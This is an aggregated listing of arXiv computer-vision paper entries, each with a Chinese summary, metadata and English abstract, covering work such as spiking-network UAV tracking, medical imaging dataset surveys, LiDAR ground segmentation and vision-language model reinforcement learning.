Abstract:To enhance the perception and reasoning capabilities of multimodal large language models in complex visual scenes, recent research has introduced agent-based workflows. In these works, MLLMs autonomously utilize image cropping tool to analyze regions of interest for question answering. While existing training strategies, such as those employing supervised fine-tuning and reinforcement learning, have made significant progress, our empirical analysis reveals a key limitation. We demonstrate the model’s strong reliance on global input and its weak dependence on the details within the cropped region. To address this issue, we propose a novel two-stage reinforcement learning framework that does not require trajectory supervision. In the first stage, we introduce the ``Information Gap" mechanism by adjusting the granularity of the global image. This mechanism trains the model to answer questions by focusing on cropped key regions, driven by the information gain these regions provide. The second stage further enhances cropping precision by incorporating a grounding loss, using a small number of bounding box annotations. Experiments show that our method significantly enhances the model’s attention to cropped regions, enabling it to achieve state-of-the-art performance on high-resolution visual question-answering benchmarks. Our method provides a more efficient approach for perceiving and reasoning fine-grained details in MLLMs. Code is available at: this https URL.
[CV-168] Fully Spiking Neural Networks with Target Awareness for Energy-Efficient UAV Tracking
【速读】:该论文旨在解决现有基于脉冲神经网络(Spiking Neural Networks, SNNs)的无人机(UAV)视觉跟踪方法严重依赖昂贵事件相机的问题,从而限制了其在资源受限的无人机平台上的部署。解决方案的关键在于提出STATrack——一种仅使用RGB输入的全脉冲神经网络框架,首次将SNN应用于UAV视觉跟踪任务。为缓解背景token对目标特征的干扰,作者进一步提出自适应最大化模板与特征之间的互信息(mutual information),从而提升目标表征能力并保持低功耗特性。
链接: https://arxiv.org/abs/2603.27493
作者: Pengzhi Zhong,Jiwei Mo,Dan Zeng,Feixiang He,Shuiwang Li
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Spiking Neural Networks (SNNs), characterized by their event-driven computation and low power consumption, have shown great potential for energy-efficient visual tracking on unmanned aerial vehicles (UAVs). However, existing efficient SNN-based trackers heavily rely on costly event cameras, limiting their deployment on UAVs. To address this limitation, we propose STATrack, an efficient fully spiking neural network framework for UAV visual tracking using RGB inputs only. To the best of our knowledge, this work is the first to investigate spiking neural networks for UAV visual tracking tasks. To mitigate the weakening of target features by background tokens, we propose adaptively maximizing the mutual information between templates and features. Extensive experiments on four widely used UAV tracking benchmarks demonstrate that STATrack achieves competitive tracking performance while maintaining low energy consumption.
[CV-169] Estimating the Impact of COVID-19 on Travel Demand in Houston Area Using Deep Learning and Satellite Imagery
【速读】:该论文旨在解决城市交通需求估算中传统数据获取方式受限的问题,尤其在突发公共卫生事件(如新冠疫情)期间,常规出行数据难以及时、准确反映真实交通活动变化。解决方案的关键在于利用高分辨率卫星遥感影像(地面采样距离GSD约为15–30 cm)结合先进的计算机视觉算法(如Detectron2和Faster R-CNN),构建车辆计数模型,对特定地点(如大学、购物中心、社区广场、餐厅和超市)的车辆数量进行自动识别与统计分析。该方法能够有效捕捉疫情前后交通行为的变化趋势,从而为交通管理部门提供可靠、实时的出行需求与经济活动监测指标。
链接: https://arxiv.org/abs/2603.27486
作者: Alekhya Pachika,Lu Gao,Lingguang Song,Pan Lu,Xingju Wang
机构: University of Houston (休斯顿大学); North Dakota State University (北达科他州立大学); Shijiazhuang Tiedao University (石家庄铁道大学)
类目: Computer Vision and Pattern Recognition (cs.CV); Applications (stat.AP)
备注:
Abstract:Considering recent advances in remote sensing satellite systems and computer vision algorithms, many satellite sensing platforms and sensors have been used to monitor the condition and usage of transportation infrastructure systems. The level of details that can be detected increases significantly with the increase of ground sample distance (GSD), which is around 15 cm - 30 cm for high-resolution satellite images. In this study, we analyzed data acquired from high-resolution satellite imagery to provide insights, predictive signals, and trend for travel demand estimation. More specifically, we estimate the impact of COVID-19 in the metropolitan area of Houston using satellite imagery from Google Earth Engine datasets. We developed a car-counting model through Detectron2 and Faster R-CNN to monitor the presence of cars within different locations (i.e., university, shopping mall, community plaza, restaurant, supermarket) before and during the COVID-19. The results show that the number of cars detected at these selected locations reduced on average 30% in 2020 compared with the previous year 2019. The results also show that satellite imagery provides rich information for travel demand and economic activity estimation. Together with advanced computer vision and deep learning algorithms, it can generate reliable and accurate information for transportation agency decision makers.
[CV-170] Difference Feedback: Generating Multimodal Process-Level Supervision for VLM Reinforcement Learning
【速读】:该论文旨在解决视觉-语言模型(Vision-Language Models, VLMs)在基于Group Relative Policy Optimization (GRPO)风格训练时,因仅依赖终端奖励而导致多步推理中信用分配稀疏的问题,进而削弱了视觉证据与中间推理步骤之间的关联性,常引发优化不稳定和视觉幻觉现象。解决方案的关键在于提出差分反馈(Differential Feedback)机制,该机制通过修复错误的推理轨迹自动构建token/step级别的监督掩码,显式标记出需要修正的关键位置,从而实现无需大规模人工标注的逐过程视觉对齐,并可无缝集成至现有GRPO类框架中。
链接: https://arxiv.org/abs/2603.27482
作者: Feiding,Yongkang Zhang,Yuhao Liao,Zijian Zeng,Chunzheng Zhu,Yaozong Zheng,Yafei Liu,Yeling Peng,Youwei Wang,Sibo Wang,Huiming Yang,Linglin Liao,Shunzhi Yang
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注:
Abstract:Vision–language models (VLMs) are increasingly aligned via Group Relative Policy Optimization (GRPO)-style training. However, relying solely on terminal outcome rewards yields sparse credit assignment in multi-step reasoning, weakening the linkage between visual evidence and intermediate steps and often causing unstable optimization and visual hallucinations. We propose Differential Feedback, which automatically constructs token/step-level supervision masks by repairing erroneous reasoning trajectories, explicitly marking the key positions that require correction. Without costly large-scale step-by-step human annotations, our method enables process-level visual alignment and can be seamlessly integrated into existing GRPO-like frameworks. Experiments on multimodal reasoning benchmarks including MMMStar and MathVista show an average 3% improvement under matched compute budgets. Our approach offers an effective, low-cost solution for accurate vision–reasoning process alignment.
[CV-171] Project Imaging-X: A Survey of 1000 Open-Access Medical Imaging Datasets for Foundation Model Development
【速读】:该论文旨在解决医学影像领域缺乏大规模、统一且高质量数据集的问题,这限制了强大医学基础模型(Medical Foundation Models)的发展。当前医学图像数据集规模有限、任务细分且分布不均,难以支撑通用性强和鲁棒性高的模型训练。其解决方案的关键在于提出一种基于元数据驱动的融合范式(Metadata-driven Fusion Paradigm, MDFP),通过整合具有相同模态或任务的多个公共数据集,将分散的小型数据孤岛转化为更大、更连贯的数据资源;在此基础上构建了一个交互式发现门户与结构化数据表,实现了端到端自动化数据集成与高效访问,为医学影像数据的规模化整合提供了可操作路径。
链接: https://arxiv.org/abs/2603.27460
作者: Zhongying Deng,Cheng Tang,Ziyan Huang,Jiashi Lin,Ying Chen,Junzhi Ning,Chenglong Ma,Jiyao Liu,Wei Li,Yinghao Zhu,Shujian Gao,Yanyan Huang,Sibo Ju,Yanzhou Su,Pengcheng Chen,Wenhao Tang,Tianbin Li,Haoyu Wang,Yuanfeng Ji,Hui Sun,Shaobo Min,Liang Peng,Feilong Tang,Haochen Xue,Rulin Zhou,Chaoyang Zhang,Wenjie Li,Shaohao Rui,Weijie Ma,Xingyue Zhao,Yibin Wang,Kun Yuan,Zhaohui Lu,Shujun Wang,Jinjie Wei,Lihao Liu,Dingkang Yang,Lin Wang,Yulong Li,Haolin Yang,Yiqing Shen,Lequan Yu,Xiaowei Hu,Yun Gu,Yicheng Wu,Benyou Wang,Minghui Zhang,Angelica I. Aviles-Rivero,Qi Gao,Hongming Shan,Xiaoyu Ren,Fang Yan,Hongyu Zhou,Haodong Duan,Maosong Cao,Shanshan Wang,Bin Fu,Xiaomeng Li,Zhi Hou,Chunfeng Song,Lei Bai,Yuan Cheng,Yuandong Pu,Xiang Li,Wenhai Wang,Hao Chen,Jiaxin Zhuang,Songyang Zhang,Huiguang He,Mengzhang Li,Bohan Zhuang,Zhian Bai,Rongshan Yu,Liansheng Wang,Yukun Zhou,Xiaosong Wang,Xin Guo,Guanbin Li,Xiangru Lin,Dakai Jin,Mianxin Liu,Wenlong Zhang,Qi Qin,Conghui He,Yuqiang Li,Ye Luo,Nanqing Dong,Jie Xu,Wenqi Shao,Bo Zhang,Qiujuan Yan,Yihao Liu,Jun Ma,Zhi Lu,Yuewen Cao,Zongwei Zhou,Jianming Liang,Shixiang Tang,Qi Duan,Dongzhan Zhou
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注: 157 pages, 19 figures, 26 tables. Project repo: \url{ this https URL }
Abstract:Foundation models have demonstrated remarkable success across diverse domains and tasks, primarily due to the thrive of large-scale, diverse, and high-quality datasets. However, in the field of medical imaging, the curation and assembling of such medical datasets are highly challenging due to the reliance on clinical expertise and strict ethical and privacy constraints, resulting in a scarcity of large-scale unified medical datasets and hindering the development of powerful medical foundation models. In this work, we present the largest survey to date of medical image datasets, covering over 1,000 open-access datasets with a systematic catalog of their modalities, tasks, anatomies, annotations, limitations, and potential for integration. Our analysis exposes a landscape that is modest in scale, fragmented across narrowly scoped tasks, and unevenly distributed across organs and modalities, which in turn limits the utility of existing medical image datasets for developing versatile and robust medical foundation models. To turn fragmentation into scale, we propose a metadata-driven fusion paradigm (MDFP) that integrates public datasets with shared modalities or tasks, thereby transforming multiple small data silos into larger, more coherent resources. Building on MDFP, we release an interactive discovery portal that enables end-to-end, automated medical image dataset integration, and compile all surveyed datasets into a unified, structured table that clearly summarizes their key characteristics and provides reference links, offering the community an accessible and comprehensive repository. By charting the current terrain and offering a principled path to dataset consolidation, our survey provides a practical roadmap for scaling medical imaging corpora, supporting faster data discovery, more principled dataset creation, and more capable medical foundation models.
[CV-172] From None to All: Self-Supervised 3D Reconstruction via Novel View Synthesis
【速读】:该论文旨在解决无监督(self-supervised)3D重建中缺乏真实标注数据和预训练先验知识时,如何同时学习显式三维几何结构与相机参数的问题。其核心挑战在于从未校准、未定位的图像序列中实现稳定且高质量的3D重建。解决方案的关键在于提出NAS3R框架,该框架通过一个共享的Transformer主干网络整合3D高斯表示的重建任务与相机参数预测任务,并利用掩码注意力机制约束优化过程;同时采用基于深度的高斯建模方式提升优化条件数,从而在仅有2D光度监督下实现端到端自监督训练,无需任何真值标注或预训练模型即可获得优于现有方法的重建性能。
链接: https://arxiv.org/abs/2603.27455
作者: Ranran Huang,Weixun Luo,Ye Mao,Krystian Mikolajczyk
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:In this paper, we introduce NAS3R, a self-supervised feed-forward framework that jointly learns explicit 3D geometry and camera parameters with no ground-truth annotations and no pretrained priors. During training, NAS3R reconstructs 3D Gaussians from uncalibrated and unposed context views and renders target views using its self-predicted camera parameters, enabling self-supervised training from 2D photometric supervision. To ensure stable convergence, NAS3R integrates reconstruction and camera prediction within a shared transformer backbone regulated by masked attention, and adopts a depth-based Gaussian formulation that facilitates well-conditioned optimization. The framework is compatible with state-of-the-art supervised 3D reconstruction architectures and can incorporate pretrained priors or intrinsic information when available. Extensive experiments show that NAS3R achieves superior results to other self-supervised methods, establishing a scalable and geometry-aware paradigm for 3D reconstruction from unconstrained data. Code and models are publicly available at this https URL.
[CV-173] LOME: Learning Human-Object Manipulation with Action-Conditioned Egocentric World Model
【速读】:该论文旨在解决人类-物体操作(human-object manipulation)在生成式视频建模中面临的挑战,尤其是动作精细性与接触丰富性导致的物理合理性不足、泛化能力差以及难以扩展至真实环境的问题。传统基于物理的动画方法依赖大量手工建模且无法适应多样化物体形态和复杂场景,而现有图像或视频生成模型在动作跟随准确性与时空一致性方面表现有限。解决方案的关键在于提出LOME(egocentric world model),其通过联合估计空间中的人体动作(包括身体姿态和手部手势)与环境上下文,在预训练视频生成模型基础上进行微调,从而实现以输入图像、文本提示及每帧动作作为条件生成高质量、具物理合理性的交互视频。该方法显著提升了动作遵循精度、跨场景泛化能力和手-物交互的物理真实性,为增强现实/虚拟现实(AR/VR)体验与可扩展机器人训练提供了新路径。
链接: https://arxiv.org/abs/2603.27449
作者: Quankai Gao,Jiawei Yang,Qiangeng Xu,Le Chen,Yue Wang
机构: University of Southern California (南加州大学); Max Planck Institute for Intelligent Syetems (马克斯·普朗克智能系统研究所); Waymo (Waymo)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Learning human-object manipulation presents significant challenges due to its fine-grained and contact-rich nature of the motions involved. Traditional physics-based animation requires extensive modeling and manual setup, and more importantly, it neither generalizes well across diverse object morphologies nor scales effectively to real-world environment. To address these limitations, we introduce LOME, an egocentric world model that can generate realistic human-object interactions as videos conditioned on an input image, a text prompt, and per-frame human actions, including both body poses and hand gestures. LOME injects strong and precise action guidance into object manipulation by jointly estimating spatial human actions and the environment contexts during training. After finetuning a pretrained video generative model on videos of diverse egocentric human-object interactions, LOME demonstrates not only high action-following accuracy and strong generalization to unseen scenarios, but also realistic physical consequences of hand-object interactions, e.g., liquid flowing from a bottle into a mug after executing a ``pouring’’ action. Extensive experiments demonstrate that our video-based framework significantly outperforms state-of-the-art image based and video-based action-conditioned methods and Image/Text-to-Video (I/T2V) generative model in terms of both temporal consistency and motion control. LOME paves the way for photorealistic AR/VR experiences and scalable robotic training, without being limited to simulated environments or relying on explicit 3D/4D modeling.
[CV-174] Evaluating Large and Lightweight Vision Models for Irregular Component Segmentation in E-Waste Disassembly
【速读】:该论文旨在解决电子废弃物(e-waste)回收中不规则且密集排列组件的精确分割问题,以支持机器人拆解和材料回收。其解决方案的关键在于对比分析不同模型架构与规模对分割性能的影响,发现轻量级YOLOv8网络在精度(mAP50 = 98.8%,mAP50-95 = 85%)和边界定位能力上显著优于基于Transformer的大规模预训练模型SAM2(mAP50 = 8.4%),并指出大型预训练模型需进行任务特定优化才能适配工业场景。研究还构建了包含1,456张标注RGB图像的新数据集及基准测试框架,为可扩展的视觉算法开发提供了基础。
链接: https://arxiv.org/abs/2603.27441
作者: Xinyao Zhang,Chang Liu,Xiao Liang,Minghui Zheng,Sara Behdad
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注: Accepted at ASME MSEC2026
Abstract:Precise segmentation of irregular and densely arranged components is essential for robotic disassembly and material recovery in electronic waste (e-waste) recycling. This study evaluates the impact of model architecture and scale on segmentation performance by comparing SAM2, a transformer-based vision model, with the lightweight YOLOv8 network. Both models were trained and tested on a newly collected dataset of 1,456 annotated RGB images of laptop components including logic boards, heat sinks, and fans, captured under varying illumination and orientation conditions. Data augmentation techniques, such as random rotation, flipping, and cropping, were applied to improve model robustness. YOLOv8 achieved higher segmentation accuracy (mAP50 = 98.8%, mAP50-95 = 85%) and stronger boundary precision than SAM2 (mAP50 = 8.4%). SAM2 demonstrated flexibility in representing diverse object structures but often produced overlapping masks and inconsistent contours. These findings show that large pre-trained models require task-specific optimization for industrial applications. The resulting dataset and benchmarking framework provide a foundation for developing scalable vision algorithms for robotic e-waste disassembly and circular manufacturing systems.
[CV-175] SpatialStack: Layered Geometry-Language Fusion for 3D VLM Spatial Reasoning CVPR2026
【速读】:该论文旨在解决大模型在3D空间推理能力上的不足,这一问题限制了其在具身智能(embodied AI)和物理AI系统中的可靠应用。核心挑战在于现有视觉语言模型(Vision-Language Models, VLMs)难以捕捉精细的三维几何结构与空间关系,尤其在融合多视角几何信息时,通常仅使用视觉和几何编码器的深层特征进行后期融合,忽略了多层次的语义与几何信号,导致空间理解能力受限。解决方案的关键在于提出SpatialStack框架——一个通用的分层融合机制,通过逐层对齐视觉、几何与语言表征,在模型层级上实现多尺度几何特征与语言主干网络的同步堆叠与对齐,从而同时保留局部几何精度与全局语境语义,显著提升模型对3D空间关系的理解能力与泛化性能。
链接: https://arxiv.org/abs/2603.27437
作者: Jiang Zhang,Shijie Zhou,Bangya Liu,Achuta Kadambi,Zhiwen Fan
机构: TAMU; UCLA; Google; UW-Madison
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: CVPR 2026, Project Website: this https URL
Abstract:Large vision-language models (VLMs) still struggle with reliable 3D spatial reasoning, a core capability for embodied and physical AI systems. This limitation arises from their inability to capture fine-grained 3D geometry and spatial relationships. While recent efforts have introduced multi-view geometry transformers into VLMs, they typically fuse only the deep-layer features from vision and geometry encoders, discarding rich hierarchical signals and creating a fundamental bottleneck for spatial understanding. To overcome this, we propose SpatialStack, a general hierarchical fusion framework that progressively aligns vision, geometry, and language representations across the model hierarchy. Moving beyond conventional late-stage vision-geometry fusion, SpatialStack stacks and synchronizes multi-level geometric features with the language backbone, enabling the model to capture both local geometric precision and global contextual semantics. Building upon this framework, we develop VLM-SpatialStack, a model that achieves state-of-the-art performance on multiple 3D spatial reasoning benchmarks. Extensive experiments and ablations demonstrate that our multi-level fusion strategy consistently enhances 3D understanding and generalizes robustly across diverse spatial reasoning tasks, establishing SpatialStack as an effective and extensible design paradigm for vision-language-geometry integration in next-generation multimodal physical AI systems.
[CV-176] Mind the Shape Gap: A Benchmark and Baseline for Deformation-Aware 6D Pose Estimation of Agricultural Produce
【速读】:该论文旨在解决农业机器人采摘场景中因农产品生物可变形性和类内形状差异大而导致的6D位姿估计精度下降问题。传统实例级方法因难以获取每件农产品的精确3D模型而失效,而依赖固定模板的类别级方法在真实几何偏差下性能显著退化。解决方案的关键在于提出SEED(Simultaneous Estimation of posE and Deformation),这是一个仅使用RGB图像的统一框架,能够从单张图像中联合预测6D位姿和显式的网格形变(lattice deformations),并通过在合成数据上应用UV层级的生成纹理增强进行训练,在8个农产品类别中有6个优于MegaPose,验证了显式形状建模对提升农业机器人位姿估计可靠性的重要性。
链接: https://arxiv.org/abs/2603.27429
作者: Nikolas Chatzis,Angeliki Tsinouka,Katerina Papadimitriou,Niki Efthymiou,Marios Glytsos,George Retsinas,Paris Oikonomou,Gerasimos Potamianos,Petros Maragos,Panagiotis Paraskevas Filntisis
机构: Athena Research Center (雅典研究中心); Hellenic Robotics Center of Excellence (希腊机器人卓越中心); School of Electrical and Computer Engineering, NTUA (国立技术大学电气与计算机工程学院); New York University (纽约大学); Department of Electrical and Computer Engineering, UTH (塞萨洛尼基大学电气与计算机工程系)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Accurate 6D pose estimation for robotic harvesting is fundamentally hindered by the biological deformability and high intra-class shape variability of agricultural produce. Instance-level methods fail in this setting, as obtaining exact 3D models for every unique piece of produce is practically infeasible, while category-level approaches that rely on a fixed template suffer significant accuracy degradation when the prior deviates from the true instance geometry. To bridge such lack of robustness to deformation, we introduce PEAR (Pose and dEformation of Agricultural pRoduce), the first benchmark providing joint 6D pose and per-instance 3D deformation ground truth across 8 produce categories, acquired via a robotic manipulator for high annotation accuracy. Using PEAR, we show that state-of-the-art methods suffer up to 6x performance degradation when faced with the inherent geometric deviations of real-world produce. Motivated by this finding, we propose SEED (Simultaneous Estimation of posE and Deformation), a unified RGB-only framework that jointly predicts 6D pose and explicit lattice deformations from a single image across multiple produce categories. Trained entirely on synthetic data with generative texture augmentation applied at the UV level, SEED outperforms MegaPose on 6 out of 8 categories under identical RGB-only conditions, demonstrating that explicit shape modeling is a critical step toward reliable pose estimation in agricultural robotics.
[CV-177] Decompose Mix Adapt: A Unified Framework for Parameter-Efficient Neural Network Recombination and Compression CVPR
【速读】:该论文旨在解决参数重组(Parameter Recombination, PR)方法在实际应用中难以同时支持多种任务的问题,例如在模型压缩(Model Compression, MC)和参数高效微调(Parameter-Efficient Fine-Tuning, PEFT)之间缺乏统一框架,导致部署时无法兼顾资源受限场景下的性能与效率。其解决方案的关键在于提出一种名为CRISP(Coefficient-gated weight Recombination by Interpolated Shared basis Projections)的通用方法,通过将预训练权重分解为共享的基础矩阵(basis matrices)和用于混合的投影权重(mixer weights),实现多任务协同:共享基础矩阵可支持模型压缩,而极小规模的混合权重(实验中少于200个参数)则使PEFT成为可能,从而在单一框架内无缝集成MC与PEFT,且显著优于现有双任务方法及当前最先进的PEFT方案。
链接: https://arxiv.org/abs/2603.27383
作者: Nazia Tasnim,Shrimai Prabhumoye,Bryan A. Plummer
机构: Boston University (波士顿大学); NVIDIA (英伟达)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Accepted in CVPR, 2026 (Main Track)
Abstract:Parameter Recombination (PR) methods aim to efficiently compose the weights of a neural network for applications like Parameter-Efficient FineTuning (PEFT) and Model Compression (MC), among others. Most methods typically focus on one application of PR, which can make composing them challenging. For example, when deploying a large model you may wish to compress the model and also quickly adapt to new settings. However, PEFT methods often can still contain millions of parameters. This may be small compared to the original model size, but can be problematic in resource constrained deployments like edge devices, where they take a larger portion of the compressed model’s parameters. To address this, we present Coefficient-gated weight Recombination by Interpolated Shared basis Projections (CRISP), a general approach that seamlessly integrates multiple PR tasks within the same framework. CRISP accomplishes this by factorizing pretrained weights into basis matrices and their component mixing projections. Sharing basis matrices across layers and adjusting its size enables us to perform MC, whereas the mixer weight’s small size (fewer than 200 in some experiments) enables CRISP to support PEFT. Experiments show CRISP outperforms methods from prior work capable of dual-task applications by 4-5% while also outperforming the state-of-the-art in PEFT by 1.5% and PEFT+MC combinations by 1%. Our code is available on the repository: this https URL.
[CV-178] Bridging Visual Representation and Reinforcement Learning from Verifiable Rewards in Large Vision-Language Models
【速读】:该论文旨在解决大型视觉语言模型(LVLMs)在应用强化学习从可验证奖励(RLVR)中训练时,因结构化表征瓶颈导致的视觉信息建模不足问题。现有方法普遍缺乏对视觉信息的显式建模与有效利用,使得视觉表示难以与强化学习优化过程紧密耦合,从而限制了多模态推理性能的进一步提升。解决方案的关键在于提出一种即插即用的奖励重加权机制——KAWHI(Key-Region Aligned Weighted Harmonic Incentive),其通过分层几何聚合自适应定位语义显著区域、基于结构化归因识别视觉关键注意力头,并进行段落级别的信用重新分配,从而将空间视觉证据与语义决定性的推理步骤对齐,显著增强统一奖励策略优化方法(如GRPO和GSPO)在多模态任务中的表现。
链接: https://arxiv.org/abs/2603.27375
作者: Yuhang Han,Yuyang Wu,Zhengbo Jiao,Yiyu Wang,Xuyang Liu,Shaobo Wang,Hanlin Xu,Xuming Hu,Linfeng Zhang
机构: EPIC Lab, SJTU; Huawei; HKUST (GZ)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Homepage: \url{ this https URL }
Abstract:Reinforcement Learning from Verifiable Rewards (RLVR) has substantially enhanced the reasoning capabilities of large language models in abstract reasoning tasks. However, its application to Large Vision-Language Models (LVLMs) remains constrained by a structural representational bottleneck. Existing approaches generally lack explicit modeling and effective utilization of visual information, preventing visual representations from being tightly coupled with the reinforcement learning optimization process and thereby limiting further improvements in multimodal reasoning performance. To address this limitation, we propose KAWHI (Key-Region Aligned Weighted Harmonic Incentive), a plug-and-play reward reweighting mechanism that explicitly incorporates structured visual information into uniform reward policy optimization methods (e.g., GRPO and GSPO). The method adaptively localizes semantically salient regions through hierarchical geometric aggregation, identifies vision-critical attention heads via structured attribution, and performs paragraph-level credit reallocation to align spatial visual evidence with semantically decisive reasoning steps. Extensive empirical evaluations on diverse reasoning benchmarks substantiate KAWHI as a general-purpose enhancement module, consistently improving the performance of various uniform reward optimization methods. Project page: KAWHI (this https URL)
[CV-179] HMPDM: A Diffusion Model for Driving Video Prediction with Historical Motion Priors
【速读】:该论文旨在解决现有视频预测模型在自动驾驶场景中面临的两大挑战:一是多阶段训练流程导致的效率低下,二是对真实驾驶场景中多样化运动模式建模不足所引发的时间一致性差和视觉质量下降问题。解决方案的关键在于提出一种基于历史运动先验信息的扩散模型(Historical Motion Priors-informed Diffusion Model, HMPDM),其核心创新包括:(i) 时序感知潜在条件模块(Temporal-aware Latent Conditioning, TaLC)用于隐式注入历史运动信息;(ii) 运动感知金字塔编码器(Motion-aware Pyramid Encoder, MaPE)实现多尺度运动特征表示;(iii) 自条件策略(Self-Conditioning, SC)提升迭代去噪过程的稳定性,从而显著增强视频预测的时空一致性和生成质量。
链接: https://arxiv.org/abs/2603.27371
作者: Ke Li,Tianjia Yang,Kaidi Liang,Xianbiao Hu,Ruwen Qin
机构: Stony Brook University (石溪大学); Pennsylvania State University (宾夕法尼亚州立大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Video prediction is a useful function for autonomous driving, enabling intelligent vehicles to reliably anticipate how driving scenes will evolve and thereby supporting reasoning and safer planning. However, existing models are constrained by multi-stage training pipelines and remain insufficient in modeling the diverse motion patterns in real driving scenes, leading to degraded temporal consistency and visual quality. To address these challenges, this paper introduces the historical motion priors-informed diffusion model (HMPDM), a video prediction model that leverages historical motion priors to enhance motion understanding and temporal coherence. The proposed deep learning system introduces three key designs: (i) a Temporal-aware Latent Conditioning (TaLC) module for implicit historical motion injection; (ii) a Motion-aware Pyramid Encoder (MaPE) for multi-scale motion representation; (iii) a Self-Conditioning (SC) strategy for stable iterative denoising. Extensive experiments on the Cityscapes and KITTI benchmarks demonstrate that HMPDM outperforms state-of-the-art video prediction methods with efficiency, achieving a 28.2% improvement in FVD on Cityscapes under the same monocular RGB input configuration setting. The implementation codes are publicly available at this https URL.
[CV-180] Falcon Perception
【速读】:该论文旨在解决感知系统中模块化编码器-解码器架构的局限性问题,即是否必须将视觉特征提取与任务预测分离,还是可以通过统一的早期融合(early-fusion)结构实现感知与任务建模的协同优化。其核心解决方案是提出Falcon Perception,一个统一的密集Transformer模型,该模型在第一层即共享参数空间处理图像块(image patches)和文本标记(text tokens),采用混合注意力机制(图像标记间双向注意力、预测标记自回归因果注意力),从而整合全局视觉上下文与可变长度实例生成能力。关键创新在于通过轻量级标记接口和专用头设计实现连续空间输出的并行高分辨率掩码预测,使复杂度主要集中在数据和训练信号上,而非模型结构本身,显著提升了mask质量(SA-Co数据集上Macro-F₁达68.0,优于SAM3的62.3)。
链接: https://arxiv.org/abs/2603.27365
作者: Aviraj Bevli,Sofian Chaybouti,Yasser Dahou,Hakim Hacid,Ngoc Dung Huynh,Phuc H. Le Khac,Sanath Narayan,Wamiq Reyaz Para,Ankit Singh
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Perception-centric systems are typically implemented with a modular encoder-decoder pipeline: a vision backbone for feature extraction and a separate decoder (or late-fusion module) for task prediction. This raises a central question: is this architectural separation essential or can a single early-fusion stack do both perception and task modeling at scale? We introduce Falcon Perception, a unified dense Transformer that processes image patches and text tokens in a shared parameter space from the first layer, using a hybrid attention pattern (bidirectional among image tokens, causal for prediction tokens) to combine global visual context with autoregressive, variable-length instance generation. To keep dense outputs practical, Falcon Perception retains a lightweight token interface and decodes continuous spatial outputs with specialized heads, enabling parallel high-resolution mask prediction. Our design promotes simplicity: we keep a single scalable backbone and shift complexity toward data and training signals, adding only small heads where outputs are continuous and dense. On SA-Co, Falcon Perception improves mask quality to 68.0 Macro-F _1 compared to 62.3 of SAM3. We also introduce PBench, a benchmark targeting compositional prompts (OCR, spatial constraints, relations) and dense long-context regimes, where the model shows better gains. Finally, we extend the same early-fusion recipe to Falcon OCR: a compact 300M-parameter model which attains 80.3% on olmOCR and 88.64 on OmniDocBench. Subjects: Computer Vision and Pattern Recognition (cs.CV) Cite as: arXiv:2603.27365 [cs.CV] (or arXiv:2603.27365v1 [cs.CV] for this version) https://doi.org/10.48550/arXiv.2603.27365 Focus to learn more arXiv-issued DOI via DataCite (pending registration)
[CV-181] rraSeg: Self-Supervised Ground Segmentation for Any LiDAR CVPR2026
【速读】:该论文旨在解决LiDAR地面分割(ground segmentation)任务中现有方法依赖特定传感器配置或昂贵的逐点人工标注标签,从而严重限制模型泛化能力和可扩展性的问题。解决方案的关键在于提出TerraSeg——首个自监督、领域无关的LiDAR地面分割模型,并构建OmniLiDAR大规模统一数据集(聚合12个主流公开基准数据集,包含近2200万原始扫描样本),通过PseudoLabeler模块实现无需人工标注的自监督运行时优化生成高质量伪标签,从而在nuScenes、SemanticKITTI和Waymo Perception等基准上达到SOTA性能并具备实时推理能力。
链接: https://arxiv.org/abs/2603.27344
作者: Ted Lentsch,Santiago Montiel-Marín,Holger Caesar,Dariu M. Gavrila
机构: Delft University of Technology (代尔夫特理工大学); University of Alcalá (阿尔卡拉大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: CVPR 2026
Abstract:LiDAR perception is fundamental to robotics, enabling machines to understand their environment in 3D. A crucial task for LiDAR-based scene understanding and navigation is ground segmentation. However, existing methods are either handcrafted for specific sensor configurations or rely on costly per-point manual labels, severely limiting their generalization and scalability. To overcome this, we introduce TerraSeg, the first self-supervised, domain-agnostic model for LiDAR ground segmentation. We train TerraSeg on OmniLiDAR, a unified large-scale dataset that aggregates and standardizes data from 12 major public benchmarks. Spanning almost 22 million raw scans across 15 distinct sensor models, OmniLiDAR provides unprecedented diversity for learning a highly generalizable ground model. To supervise training without human annotations, we propose PseudoLabeler, a novel module that generates high-quality ground and non-ground labels through self-supervised per-scan runtime optimization. Extensive evaluations demonstrate that, despite using no manual labels, TerraSeg achieves state-of-the-art results on nuScenes, SemanticKITTI, and Waymo Perception while delivering real-time performance. Our code and model weights are publicly available.
[CV-182] A Comparative Study in Surgical AI: Datasets Foundation Models and Barriers to Med-AGI
【速读】:该论文旨在解决当前生成式 AI 模型在神经外科手术图像分析任务中表现不足的问题,尤其是工具检测这一看似简单但实际复杂的任务。尽管模型参数规模和训练数据量持续增长,研究发现即使采用多十亿参数的视觉语言模型(Vision Language Models, VLMs)并进行充分训练,现有方法仍难以达到可靠性能;进一步的缩放实验表明,增加模型规模或训练时间仅带来边际收益,且某些限制因素无法通过单纯扩大计算资源消除。论文指出,问题的关键不在于数据和标签的可用性,而在于手术场景中多模态信息融合、人机交互与物理效应等复杂性对模型泛化能力构成根本挑战,因此未来解决方案需聚焦于改进模型架构设计与任务建模方式,而非单纯依赖算力扩展。
链接: https://arxiv.org/abs/2603.27341
作者: Kirill Skobelev,Eric Fithian,Yegor Baranovski,Jack Cook,Sandeep Angara,Shauna Otto,Zhuang-Fang Yi,John Zhu,Daniel A. Donoho,X.Y. Han,Neeraj Mainkar,Margaux Masson-Forsythe
